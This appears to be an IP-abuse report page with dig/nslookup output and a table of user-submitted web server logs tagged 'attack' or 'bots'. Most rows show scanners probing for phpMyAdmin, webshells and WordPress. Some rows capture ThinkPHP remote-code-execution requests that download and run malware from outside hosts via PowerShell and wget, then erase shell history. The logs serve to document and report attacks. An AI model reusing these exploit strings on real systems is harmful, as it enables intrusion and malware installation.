城市(city): unknown
省份(region): unknown
国家(country): United States of America (the)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 11.18.63.226
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3498
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;11.18.63.226. IN A
;; AUTHORITY SECTION:
. 540 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024010601 1800 900 604800 86400
;; Query time: 20 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Jan 07 04:15:52 CST 2024
;; MSG SIZE rcvd: 105Host 226.63.18.11.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 226.63.18.11.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 54.242.155.91 | attack | 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET HTTP/1.1" 400 182 "-" "-" |
2019-04-14 19:37:25 |
| 202.53.139.49 | attack | 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpma/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpMyAbmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpMyAdmin__/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 202.53.139.49 - - [06/Apr/2019:13:57:37 +0800] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" |
2019-04-06 13:59:10 |
| 185.53.91.24 | bots | 185.53.91.24 - - [06/Apr/2019:07:13:10 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0" 185.53.91.24 - - [06/Apr/2019:07:13:12 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 301 194 "-" "python-requests/2.21.0" 185.53.91.24 - - [06/Apr/2019:07:13:14 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0" |
2019-04-06 07:34:25 |
| 180.97.35.15 | bots | 据说是百度网讯的节点,反正最近爬的挺频繁的 180.97.35.59 180.97.35.4 180.97.35.5 等 |
2019-04-06 07:11:18 |
| 37.59.68.172 | attack | 37.59.68.172 - - [09/Apr/2019:14:34:22 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 3623 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36" 37.59.68.172 - - [09/Apr/2019:14:34:23 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 3623 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36" 37.59.68.172 - - [09/Apr/2019:14:34:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 3623 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 37.59.68.172 - - [09/Apr/2019:14:34:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 3623 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 37.59.68.172 - - [09/Apr/2019:14:34:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 3623 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36" |
2019-04-09 14:45:03 |
| 77.247.109.79 | botsattack | 77.247.109.79 - - [12/Apr/2019:14:11:58 +0800] "GET /admin/config.php HTTP/1.1" 404 232 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2" 77.247.109.79 - - [12/Apr/2019:14:11:59 +0800] "\\x16\\x03\\x01\\x00\\x90\\x01\\x00\\x00\\x8C\\x03\\x03g\\xC4\\x0C\\x1A\\xF7q|\\xEF\\x98\\xBC\\x1AO\\xC2!\\x14-\\xA3K\\x85\\xCD\\xA5aG\\xEF\\xD8\\xC3\\x99y:F|\\xBA\\x00\\x00.\\xC0+\\xC0/\\x00\\x9E\\x00\\x9C\\xC0" 400 182 "-" "-" |
2019-04-12 14:16:02 |
| 35.229.108.3 | bots | 35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/vladimir_putin_2019_04_09_en/ HTTP/1.1" 200 13467 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0" 35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/apple_2019_04_09_en/ HTTP/1.1" 200 13979 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0" 35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/taylor_swift_2019_04_09_en/ HTTP/1.1" 200 13803 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0" 35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/google_2019_04_09_en/ HTTP/1.1" 200 15835 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0" 35.229.108.3 - - [09/Apr/2019:10:36:02 +0800] "GET /index.php/2019/04/09/uber_2019_04_09_en/ HTTP/1.1" 200 13643 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0" |
2019-04-09 10:36:45 |
| 80.82.77.33 | bots | 80.82.77.33 - - [05/Apr/2019:13:44:18 +0800] "GET / HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 80.82.77.33 - - [05/Apr/2019:13:44:24 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:35 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:38 +0800] "quit" 400 182 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:41 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /sitemap.xml HTTP/1.1" 200 1425241 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:46 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.13.0" 80.82.77.33 - - [05/Apr/2019:13:44:47 +0800] "" 400 0 "-" "-" |
2019-04-05 13:47:49 |
| 120.131.10.157 | attack | 120.131.10.157 - - [09/Apr/2019:04:15:09 +0800] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 10484 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" |
2019-04-09 04:15:48 |
| 116.255.152.176 | attack | 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-10 10:27:18 |
| 118.25.145.186 | attack | 118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.145.186 - - [08/Apr/2019:16:46:35 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start%20C:/Windows/temp/hchqnxhwaxuxfid24711.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/hchqnxhwaxuxfid24711.exe');start C:/Windows/temp/hchqnxhwaxuxfid24711.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-08 16:47:25 |
| 101.226.114.193 | attack | 101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 404 209 "http://118.25.52.138/zuos.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 404 209 "http://118.25.52.138/MCLi.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-13 13:01:46 |
| 60.215.24.152 | attack | 伪装爬虫攻击 60.215.24.152 - - [09/Apr/2019:05:27:08 +0800] "POST ///zhanpushi.asp HTTP/1.1" 404 571 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///data/shitan.php HTTP/1.1" 404 573 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///e/news.php HTTP/1.1" 404 568 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///plus/e7xue.php HTTP/1.1" 404 572 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///aurrs.jsp HTTP/1.1" 404 567 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///eback/bdata/u113791a_20110421200120/config.php HTTP/1.1" 404 604 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" |
2019-04-09 07:21:00 |
| 121.84.221.236 | attack | 121.84.221.236 - - [08/Apr/2019:19:53:14 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)" |
2019-04-08 19:54:18 |
| 163.177.90.152 | attack | 163.177.90.152 - - [06/Apr/2019:14:59:21 +0800] "GET /infoo.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [06/Apr/2019:14:59:22 +0800] "GET /infoo.php HTTP/1.1" 404 209 "http://118.25.52.138/infoo.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 15:00:05 |